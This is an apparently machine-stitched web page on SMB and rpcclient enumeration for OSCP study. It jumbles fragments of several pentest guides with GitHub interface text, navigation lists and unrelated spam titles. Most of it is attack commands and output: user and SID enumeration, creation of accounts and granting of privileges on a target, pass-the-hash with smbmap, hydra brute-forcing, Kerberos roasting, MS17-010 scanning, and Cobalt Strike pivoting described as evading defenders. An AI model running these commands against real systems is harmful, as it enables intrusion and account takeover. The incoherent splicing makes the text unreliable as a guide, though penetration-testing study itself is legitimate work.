rpcclient enumeration oscp

S-1-5-21-1835020781-2383529660-3657267081-1013 LEWISFAMILY\mail (2) There are numerous tools and methods to perform enumeration, we will be finding different types of information on SMB throughout the article. Nmap scan report for [ip] Protocol_Name: SMB #Protocol Abbreviation if there is one. [DATA] attacking service smb on port 139 D 0 Thu Sep 27 16:26:00 2018 Honor privileges assigned to specific SID? {% code-tabs-item title="attacker@cobaltstrike" %}, {% endcode-tabs-item %} so lets run rpcclient with no options to see what's available: SegFault:~ cg$ rpcclient. Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: Moving on, same way, they can query info about specific AD users: Enumerate current user's privileges and many more (consult rpcclient for all available commands): Finally, of course they can run nmap if needed: Impacket provides even more tools to enumerate remote systems through compromised boxes. May need to run a second time for success. | getdompwinfo Retrieve domain password info --------------- ---------------------- adddriver Add a print driver 1026 - Pentesting Rusersd. Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging, https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html, https://github.com/SecureAuthCorp/impacket/tree/master/examples, https://www.cobaltstrike.com/help-socks-proxy-pivoting, https://www.youtube.com/watch?v=l8nkXCOYQC4&index=19&list=WL&t=7s, code execution on a target system and the beacon is calling back to the team server, PID 260 - beacon injected into dllhost process. This is an approach I came up with while researching on offensive security. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi, if [ ! The rpcclient was designed to perform debugging and troubleshooting tasks on a Windows Samba configuration. [Original] As I've been working through PWK/OSCP for the last month, one thing I've noticed is that enumeration of SMB is tricky, and different tools . # lines. Curious to see if there are any "guides" out there that delve into SMB . Obviously the SIDS are different but you can still pull down the usernames and start bruteforcing those other open services. queryuseraliases Query user aliases . logonctrl Logon Control After creating the group, it is possible to see the newly created group using the enumdomgroup command. [+] IP: [ip]:445 Name: [ip] Metasploit SMB auxiliary scanners. If this information does not appear in other used tools, you can: # Requires root or enough permissions to use tcpdump, # Will listen for the first 7 packets of a null login, # Will sometimes not capture or will print multiple. Enum4linux. The main application area of the protocol has been the, operating system series in particular, whose network services support SMB in a downward-compatible manner - which means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed. --------------- ---------------------- -P, --machine-pass Use stored machine account password offensive security. rpcclient $> help Hashes work. share Disk 445/tcp open microsoft-ds | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx To do this first, the attacker needs a SID. ENUMERATING USER ACCOUNTS ON LINUX AND OS X WITH RPCCLIENT, Hacking Samba on Ubuntu and Installing the Meterpreter. MAC Address: 00:50:56:XX:XX:XX (VMware) getdcname Get trusted DC name Manh-Dung Nguyen Blog Pentest Publications Whoami @ This will attempt to connect to the share. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following: If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about. While Port 139 is known technically as NBT over IP, Port 445 is SMB over IP. rffpcnex Rffpcnex test rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013 querygroupmem Query group membership [INFO] Reduced number of tasks to 1 (smb does not like parallel connections) To extract further information about that user or in case during the other enumeration the attacker comes into the touch of the SID of a user, then they cause to use the lookupsids command to get more information about that particular user. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. [hostname] <20> - M | A critical remote code execution vulnerability exists in Microsoft SMBv1 Query Group Information and Group Membership. Further, when the attacker used the same SID as a parameter for lsaenumprivaccount, they were able to enumerate the levels of privileges such as high, low, and attribute. Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out. queryusergroups Query user groups S-1-5-21-1835020781-2383529660-3657267081-1011 LEWISFAMILY\operator (2) rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1003 IS~[hostname] <00> - M 1690825 blocks of size 2048. result was NT_STATUS_NONE_MAPPED {% code-tabs-item title="attacker@kali" %}. -N, --no-pass Don't ask for a password samlookuprids Look up names null session or valid credentials). It can be used on the rpcclient shell that was generated to enumerate information about the server. That command reveals the SIDs for different users on the domain. Passing the SID as a parameter in the lsacreateaccount command will enable us as an attacker to create an account object as shown in the image below. In our previous attempt to enumerate SID, we used the lsaenumsid command. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2003 guest access disabled, uses encryption. ---- ----------- | State: VULNERABLE If you want to enumerate all the shares then use netshareenumall. In the demonstration presented, there are two domains: IGNITE and Builtin. Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds. SeSecurityPrivilege 0:8 (0x0:0x8) Learning about various kinds of compromises that can be performed using Mimikatz we know that the SID of a user is the security Identifier that can be used for a lot of elevating privileges and minting tickets attacks. authentication -A, --authentication-file=FILE Get the credentials from a file Code & Process Injection. smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively, smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '. Hence, the credentials were successfully enumerated and the account can be taken over now. netname: PSC 2170 Series C$ NO ACCESS It is also possible to add and remove privileges to a specific user as well. It has undergone several stages of development and stability. rpcclient $> lookupnames lewis 4. Running something like ngrep -i -d tap0 's.?a.?m.?b.?a. srvinfo Server query info Cracking Password. maybe brute-force ; 22/SSH. shutdown Remote Shutdown But it is also possible to get the password properties of individual users using the getusrdompwinfo command with the users RID. To demonstrate this, the attacker first used the lsaaddpriv command to add the SeCreateTokenPrivielge to the SID and then used the lsadelpriv command to remove that privilege from that group as well. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation. -c, --command=COMMANDS Execute semicolon separated cmds Port_Number: 137,138,139 #Comma separated if there is more than one. | grep -oP 'UnixSamba. First one - two Cobalt Strike sessions: Second - attacker opens a socks4 proxy on port 7777 on his local kali machine (10.0.0.5) by issuing: {% code-tabs %} Then the attacker used the SID to enumerate the privileges using the lsaenumacctrights command. Ill include examples, but where I use PWK labs, Ill anonymize the data per their rules. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. This is what happens - attacker (10.0.0.5) uses proxychains with impacket's reg utility to retrieve the hostname of the box at 10.0.0.7 (WS02) via the compromised (CS beacon) box 10.0.0.2 (WS01): The below shows traffic captures that illustrate that the box 10.0.0.2 enumerates 10.0.0.7 using SMB traffic only: Below further proves that the box 10.0.0.2 (WS01 which acted as proxy) did not generate any sysmon logs and the target box 10.0.0.7 (WS02) logged a couple of events, that most likely would not attract much attention from the blue teams: Note how only the SMB traffic between the compromised system and the DC is generated, but no new processes are spawned by the infected dllhost process: {% embed url="https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html" %}, {% embed url="https://github.com/SecureAuthCorp/impacket/tree/master/examples" %}, {% embed url="https://www.cobaltstrike.com/help-socks-proxy-pivoting" %}, {% embed url="https://www.youtube.com/watch?v=l8nkXCOYQC4&index=19&list=WL&t=7s" %}. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1001 139/tcp open netbios-ssn Let's see how this works by firstly updating the proxychains config file: Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: proxychains rpcclient 10.0.0.6 -U spotless, Victim (10.0.0.2) is enumerating DC (10.0.0.6) on behalf of attacker (10.0.0.5). Shortcut to New Folder (2).lnk A 420 Sun Dec 13 05:24:51 2015 What permissions must be assigned to the newly created files? We have enumerated the users and groups on the domain but not enumerated the domain itself. Upon running this on the rpcclient shell, it will extract the groups with their RID. Common share names for windows targets are, You can try to connect to them by using the following command, # null session to connect to a windows share, # authenticated session to connect to a windows share (you will be prompted for a password), "[+] creating a null session is possible for, # no output if command goes through, thus assuming that a session was created, # echo error message (e.g. result was NT_STATUS_NONE_MAPPED . C$ NO ACCESS In general, the rpcclient can be used to connect to the SMB protocol as well. Since we performed enumeration on different users, it is only fair to extend this to various groups as well. Guest access disabled by default. May need to run a second time for success. If in the above example the ttl=127, then it is safe to assume (from this information alone) that the host, 10.10.10.10, is a Linux host. netfileenum Enumerate open files exit Exit program Adding it to the original post. So, it is also a good way to enumerate what kind of services might be running on the server, this can be done using enumdomgroup. This command helps the attacker enumerate the security objects or permissions and privileges related to the security as demonstrated below. Disk Permissions Test. A Little Guide to SMB Enumeration. rpcclient $> enumprivs enumdrivers Enumerate installed printer drivers SegFault:~/Documents/Evil cg$ hydra -l lewis -P common-passwords.txt 192.168.182.36 smb -V Enter WORKGROUP\root's password: #These are the commands I run in order every time I see an open SMB port, smbclient -N //{IP}/ --option="client min protocol"=LANMAN1, crackmapexec smb {IP} --pass-pol -u "" -p "", crackmapexec smb {IP} --pass-pol -u "guest" -p "", GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all, GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat, GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/", smbmap -H {IP} -u {Username} -p {Password}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`, crackmapexec smb {IP} -u {Username} -p {Password} --shares, GetADUsers.py {Domain_Name}/{Username}:{Password} -all, GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat, GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request, https://book.hacktricks.xyz/pentesting/pentesting-smb, Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}, Description: SMB Vuln Scan With Nmap (Less Specific), Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}, Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb, Name: SMB/SMB2 139/445 consolesless mfs enumeration, Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole, Note: sourced from https://github.com/carlospolop/legion, Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'. 623/UDP/TCP - IPMI. This group constitutes 7 attributes and 2 users are a member of this group. # lines. -d, --debuglevel=DEBUGLEVEL Set debug level After that command was run, rpcclient will give you the most excellent "rpcclient> " prompt. May need to run a second time for success. [hostname] <00> - M --------- ------- You signed in with another tab or window. The next command to demonstrate is lookupsids. rpcclient $> queryuser msfadmin. Host script results: Flashcards. | \\[ip]\share: NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME), # returns NT_STATUS_ACCESS_DENIED or even gives you a session. deletedomuser Delete domain user --------- -------, Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-27 16:25 EDT S-1-5-21-1835020781-2383529660-3657267081-2003 LEWISFAMILY\user (2) rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1004 In this article, we are going to focus on the enumeration of the Domain through the SMB and RPC channels. samsync Sam Synchronisation Nice! Since we already performed the enumeration of such data before in the article, we will enumerate using enumdomgroup and enumdomusers and the query-oriented commands in this demonstration. 1080 - Pentesting Socks. rpcclient is a part of the Samba suite on Linux distributions. Learn more about the OS Versions. IPC$ NO ACCESS It can be enumerated through rpcclient using the lsaenumsid command. | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | Comment: Remote Admin Are you sure you want to create this branch? Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can ever execute commands on writable shares. Hydra v5.1 (c) 2005 by van Hauser / THC - use allowed only for legal purposes. enumdomusers Enumerate domain users rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1015 --------------- ---------------------- Checklist - Local Windows Privilege Escalation, Pentesting JDWP - Java Debug Wire Protocol, 161,162,10161,10162/udp - Pentesting SNMP, 515 - Pentesting Line Printer Daemon (LPD), 548 - Pentesting Apple Filing Protocol (AFP), 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP, 1433 - Pentesting MSSQL - Microsoft SQL Server, 1521,1522-1529 - Pentesting Oracle TNS Listener, 2301,2381 - Pentesting Compaq/HP Insight Manager, 3690 - Pentesting Subversion (svn server), 4369 - Pentesting Erlang Port Mapper Daemon (epmd), 8009 - Pentesting Apache JServ Protocol (AJP), 8333,18333,38333,18444 - Pentesting Bitcoin, 9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream), 10000 - Pentesting Network Data Management Protocol (ndmp), 24007,24008,24009,49152 - Pentesting GlusterFS, 50030,50060,50070,50075,50090 - Pentesting Hadoop, Reflecting Techniques - PoCs and Polygloths CheatSheet, Dangling Markup - HTML scriptless injection, HTTP Request Smuggling / HTTP Desync Attack, Regular expression Denial of Service - ReDoS, Server Side Inclusion/Edge Side Inclusion Injection, XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations), Pentesting CI/CD (Github, Jenkins, Terraform), Windows Exploiting (Basic Guide - OSCP lvl), INE Courses and eLearnSecurity Certifications Reviews, Stealing Sensitive Information Disclosure from a Web, Enumerate Users, Groups & Logged On Users, Manually enumerate windows shares and connect to them, . lookupdomain Lookup Domain Name | Current user access: Nmap done: 1 IP address (1 host up) scanned in 5.58 seconds, # Requires root or enough permissions to use tcpdump, # Will listen for the first 7 packets of a null login, # Will sometimes not capture or will print multiple. This cheat sheet should not be considered to be complete and only represents a snapshot in time when I used these commands for performing enumeration during my OSCP journey. Server Comment In the demonstration, it can be observed that the SID that was enumerated belonged to the Administrator of the Builtin users. |_ Current user access: READ | Current user access: READ/WRITE The below shows a couple of things. getdriver Get print driver information and therefore do not correspond to the rights assigned locally on the server. SQL Injection & XSS Playground. Dec 2, 2018, PWK Notes: SMB Enumeration Checklist [Updated]. When it was passed as a parameter in the command lookupsids, the attacker was able to know that this belongs to the group Everyone. Initial Access. For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. Let's see how this works by firstly updating the proxychains config file: {% code-tabs %} This command will show you the shares on the host, as well as your access to them. You signed in with another tab or window. When used with the builtin parameter, it shows all the built-in groups by their alias names as demonstrated below. Allow connecting to the service without using a password? password: guest S-1-5-21-1835020781-2383529660-3657267081-1063 (Local Group: 4) S-1-5-21-1835020781-2383529660-3657267081-1003 LEWISFAMILY\daemon (2) -k, --kerberos Use kerberos (active directory) MAC Address = 00-50-56-XX-XX-XX, [+] Finding open SMB ports. Similarly to enumerate the Primary Domain Information such as the Role of the machine, Native more of the Domain can be done using the dsroledominfo command as demonstrated. 631 - Internet Printing Protocol (IPP) 873 - Pentesting Rsync. | IDs: CVE:CVE-2006-2370 Sharename Type Comment SMB stands for Server Message Blocks. Hydra (http://www.thc.org) starting at 2007-07-27 21:51:46 schannel Force RPC pipe connections to be sealed with 'schannel' (NETSEC). When provided with the username to the samlookupnames command, it can extract the RID of that particular user. . *[[:digit:]]' port 139 in one terminal and then echo exit | smbclient -L [IP] in another will dump out a bunch of info including the version. dsenumdomtrusts Enumerate all trusted domains in an AD forest The connection uses. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2000 WORKGROUP <00> - M enumprivs Enumerate privileges S-1-5-21-1835020781-2383529660-3657267081-1007 LEWISFAMILY\sys (2) The manipulation of the groups is not limited to the creation of a group. to access through Web; FTP to file upload ==> Execute from web == webshell ; Password Checking if you found with other enum. Get help on commands If the permissions allow, an attacker can delete a group as well. With --pw-nt-hash, the pwd provided is the NT hash, #Use --no-pass -c 'recurse;ls' to list recursively with smbclient, #List with smbmap, without folder it list everything. This is newer version of SMB. A NetBIOS name is up to 16 characters long and usually, separate from the computer name. | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) Workgroup Master deldriverex Delete a printer driver with files WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort -?, --help Show this help message rpcclient -U '%' -N <IP> Web-Enum . In the previous command, we used the getdompwinfo to get the password properties of the domain administrated by the policies. Wordlist dictionary. This is what happens - attacker (10.0.0.5) uses proxychains with impacket's reg utility to retrieve the hostname of the box at 10.0.0.7 (WS02) via the compromised (CS beacon) box 10.0.0.2 (WS01): keyName hklm\system\currentcontrolset\control\computername\computername.
Comal Isd Superintendent Student Of The Month, Zoe Simmons Gymnast, Funny Memes 2021 Dirty, Did Questlove Leave The Tonight Show, Articles R